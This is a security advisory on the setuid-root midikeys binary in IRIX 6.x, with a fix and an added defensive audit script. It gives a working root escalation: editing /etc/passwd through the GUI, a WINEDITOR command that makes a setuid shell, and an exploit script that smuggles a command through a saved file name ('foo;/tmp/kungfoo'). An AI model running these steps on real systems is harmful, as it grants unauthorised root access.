COMMAND
midikeys
SYSTEMS AFFECTED
IRIX 6.2, 6.3, 6.5, 6.5.3
PROBLEM
Larry W. Cashdollar found the following (tested on IRIX64 devel 6.5
05190004). The setuid root binary midikeys can be used to read
any file on the system through its GUI interface. It can also be
used to edit any file on the system. One can get from guest
account access to root access using the following procedure.
1) Choose an unpassworded account and telnet in (like guest or lp)
devel 25% id
uid=998 gid=998(guest)
2) Execute the midikeys application with DISPLAY set to your host
devel 26% ./midikeys
devel 27% Xlib: extension "GLX" missing on display "grinch:0.0".
Xlib: extension "GLX" missing on display "grinch:0.0".
3) In the midikeys window, click "sounds" and then "midi songs".
This will open a file-manager-style interface.
4) You can enter the path and filename of any file you wish to read,
including root-owned files with the group/world read/write
permissions unset.
5) If you select a file like "/usr/share/data/music/README" it
will appear in a text editor. Use the text editor to open
/etc/passwd and make modifications at will. Save and enjoy.
So, you can remove the '*' from the sysadm password field...
$ su sysadm
# id
uid=0(root) gid=0(sys)
devel 28% ls -l /usr/sbin/midikeys
-rwsr-xr-x 1 root root 218712 Jan 10 17:19 /usr/sbin/midikeys
You just need an account to gain root privileges; it's not limited
to the unpassworded accounts, any normal user could use this
exploit. This was verified to work on an O2 running IRIX 6.3
(IRIX o2 6.3 O2 R10000 12161207 IP32) and on an Octane running
IRIX 6.5.3 (IRIX64 octane 6.5 6.5.3m 01221553 IP30). It seems
that whether you use vi or some other editor makes a difference.
So far it won't work with vi, but if you open an X11 editor
(gvim), it will run as root and you will be able to edit
anything, again... In the end, it turns out that one does not
need any particular text editor to exploit the vulnerability.
That's because of a nice "feature" of the desktop environment
variable WINEDITOR, which can be set to any system command, e.g.,
"/bin/chmod 4755 /tmp/bsh" (where /tmp/bsh is just a root-owned
copy of the Bourne shell). This can be done both on IRIX 6.2 (e.g.,
using toolchest -> Desktop -> Customize -> Desktop -> Default
Editor: Other...) and on IRIX 6.5 (toolchest -> Desktop ->
Customize -> Utilities -> Text Editor: Other...). After setting
WINEDITOR (which can be verified by inspecting
~/.desktop-hostname/desktopenv) the exploit follows the
well-known path: run midikeys, open the file manager, etc.
A similar approach to exploiting this vulnerability was given by
Loneguard:
#!/bin/sh
#
# Irix 6.x soundplayer xploit - Loneguard 20/02/99
#
# Good example of how bad coding in a non-setuid/privileged process
# can offer up rewt
#
# Write the helper program that soundplayer will end up running.
cat > /tmp/crazymonkey.c << 'EOF'
#include <stdlib.h>
#include <unistd.h>
int main(void) {
    setuid(0);
    system("cp /bin/csh /tmp/xsh;chmod 4755 /tmp/xsh");
    return 0;
}
EOF
cc -o /tmp/kungfoo /tmp/crazymonkey.c
/usr/sbin/midikeys &
echo "You should now see the midikeys window, goto the menu that allows you to play sounds and load a wav. This will bring up a soundplayer window. Save the wav as 'foo;/tmp/kungfoo' and go find a rewt shell in tmp"
This works fine on Irix 6.4 here... although some people had to
change csh to sh... csh returned permission denied, 4755 and all.
The problem here is that various csh's won't run setuid-root scripts
unless you specify (I think) the -b flag. From the Solaris csh
man page:
...
-b Force a "break" from option processing. Subsequent
command line arguments are not interpreted as C
shell options. This allows the passing of options
to a script without confusion. The shell does not
run set-user-ID or set-group-ID scripts unless
this option is present.
...
Then again, maybe it was done deliberately to foil script kiddies.
SOLUTION
Unpassworded accounts? That's a known (and documented) feature on
IRIX systems. The first thing you do when you unpack an IRIX box is
set a root password and disable the open accounts (EZsetup,
OutOfBox, lp, guest, 4Dgifts, sgiweb). There's even an entry in
the "System Manager" to do it. Then remove the suid bit.
After a chmod u-s midikeys, midikeys still works, at least after a
very quick test. Removing the setuid permission does disable some
functionality, but that functionality is not implemented or used at
this time. So,
% ls -la /usr/sbin/midikeys
-rwsr-xr-x 1 root sys 218712 Mar 8 14:57 /usr/sbin/midikeys
% /bin/su -
#
# /bin/chmod 555 /usr/sbin/midikeys
# ls -la /usr/sbin/midikeys
-r-xr-xr-x 1 root sys 218712 May 20 13:57 /usr/sbin/midikeys
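As an added defender-side check (not part of the advisory, and not an IRIX tool), the POSIX shell snippet below lists the stock IRIX accounts named above that still have an empty password field, flags any uid-0 entry without a password (which is what the /etc/passwd edit described in PROBLEM produces), and reports whether a binary still carries the setuid bit. The passwd lines are constructed sample data; the account list and the /usr/sbin/midikeys path come from the advisory.

```shell
#!/bin/sh
# Added audit helper; not from the advisory. All input below is constructed.

# Stock IRIX accounts the SOLUTION section says to disable.
STOCK_ACCOUNTS="EZsetup OutOfBox lp guest 4Dgifts sgiweb"

# Constructed sample of /etc/passwd contents, not taken from any real host.
# sysadm is shown the way the advisory's edit leaves it: the '*' removed.
SAMPLE_PASSWD='root:x:0:0:Super-User:/:/bin/sh
sysadm::0:0:System V Administration:/usr/admin:/bin/sh
guest::998:998:Guest Account:/usr/people/guest:/bin/csh
lp::9:9:Print Spooler Owner:/var/spool/lp:/bin/sh
4Dgifts:*:999:998:4Dgifts Account:/usr/people/4Dgifts:/bin/csh
bob:x:1001:20:Bob:/usr/people/bob:/bin/sh'

# Print one line per account whose password field is empty and which is
# either uid 0 or one of the stock accounts.  Usage: audit_passwd "<text>"
audit_passwd() {
    printf '%s\n' "$1" | while IFS=: read -r name pw uid rest; do
        [ -z "$pw" ] || continue
        if [ "$uid" = 0 ]; then
            printf '%s: uid 0 with empty password\n' "$name"
            continue
        fi
        for acct in $STOCK_ACCOUNTS; do
            if [ "$name" = "$acct" ]; then
                printf '%s: stock account with empty password\n' "$name"
            fi
        done
    done
}

# Print "setuid" if the file has the set-user-ID bit set, else "clean"
# (a missing file also reports "clean").
setuid_state() {
    if [ -u "$1" ]; then
        echo setuid
    else
        echo clean
    fi
}

# Run against the sample data and the binary path from the advisory.
audit_passwd "$SAMPLE_PASSWD"
printf '/usr/sbin/midikeys: %s\n' "$(setuid_state /usr/sbin/midikeys)"
```

On a real host, replace the sample with `audit_passwd "$(cat /etc/passwd)"` and run the setuid check over the output of `find / -perm -4000` to catch the other setuid-root binaries the advisory does not mention.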